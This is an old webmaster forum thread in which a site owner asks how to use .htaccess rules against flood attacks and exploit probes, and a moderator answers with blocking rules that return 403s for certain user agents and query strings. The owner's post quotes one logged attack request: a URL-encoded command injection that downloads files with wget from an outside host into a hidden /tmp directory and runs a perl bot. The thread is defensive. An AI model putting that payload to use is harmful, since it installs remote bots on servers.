Forum Moderators: phranque
We have an education site, and over the last 3 weeks we have faced a lot of flood attacks.
We decided to add hotlink protection for our PHP pages with these lines in the .htaccess file:
RewriteRule .*\.(jpg|jpeg|gif|png|bmp|php)$ [mysite.com...]
In this way we try to send requests with no referer to a light page (index.html).
My first question: is it OK to do it like this?
After that, thousands of flood entries were logged, looking like this:
***.*.***.** - - [14/Jan/2005:05:46:58 -0600] "POST /index.php HTTP/1.0" 302 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; .NET CLR 1.0.3705)"
By doing this, our server overload has decreased.
Is there a way to recognize a flood attack and prevent it?
My second question:
I want to allow at least the Alexa and Google search bots to crawl every page of my sites. How can I do that with the .htaccess file?
Also, requests with a specific referer should be able to access my site, for example:
www.google.com
One more request, regarding this log entry:
193.158.85.100 - - [02/Jan/2005:22:52:02 -0600] "GET /viewtopic.php?t=285&rush=%65%63%68%6F%20%5F%53%54
%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20
[example.org...]
ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=
%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
HTTP/1.1" 302 880 "-" "LWP::Simple/5.64"
How can I disallow (not redirect to another page) a request if it has the word "rush" in it?
Maybe all these questions have very easy answers, but we have to hurry before our site gets overloaded and suspended again.
Thanks a lot in advance.
[edited by: jdMorgan at 6:33 pm (utc) on Jan. 24, 2005]
[edit reason] Removed specifics, Fixed formatting. [/edit]
Welcome to WebmasterWorld!
This is a deep subject area, and we have hundreds of threads about hotlinking here. Even though you are in a hurry, reading some of these threads [google.com] will save you a lot of time and wasted effort.
To save bandwidth, don't redirect hotlinkers to another page. This results in *another* request to your server! Instead, just return a 403-Forbidden response. Make sure your custom 403 error page (if you have one) is very short. Example:
# block external referrers unless blank (allow search robots, corporate and ISP proxies)
RewriteCond %{HTTP_REFERER} .
RewriteCond %{HTTP_REFERER} !^http://(www\.)?yoursite\.com [NC]
RewriteRule \.(gif|jpe?g|png|bmp)$ - [NC,F]
#
# Block site downloaders
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} larbin [NC]
RewriteRule .* - [F]
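As for your other two questions: a pass-through rule placed above the blocking rules will let named robots bypass them, and a check on %{QUERY_STRING} will return a 403 directly for the "rush" exploit attempts. Here is an untested sketch; verify the current user-agent strings yourself (Google's crawler identifies itself as "Googlebot" and Alexa's as "ia_archiver"):

# Let Googlebot and Alexa's ia_archiver bypass the rules below
RewriteCond %{HTTP_USER_AGENT} (Googlebot|ia_archiver) [NC]
RewriteRule .* - [L]
#
# Return 403-Forbidden (no redirect) for any request with "rush" in the query string
RewriteCond %{QUERY_STRING} rush [NC]
RewriteRule .* - [F]

Note that the [F] flag implies [L] and returns the 403 response directly, so no second request hits your server.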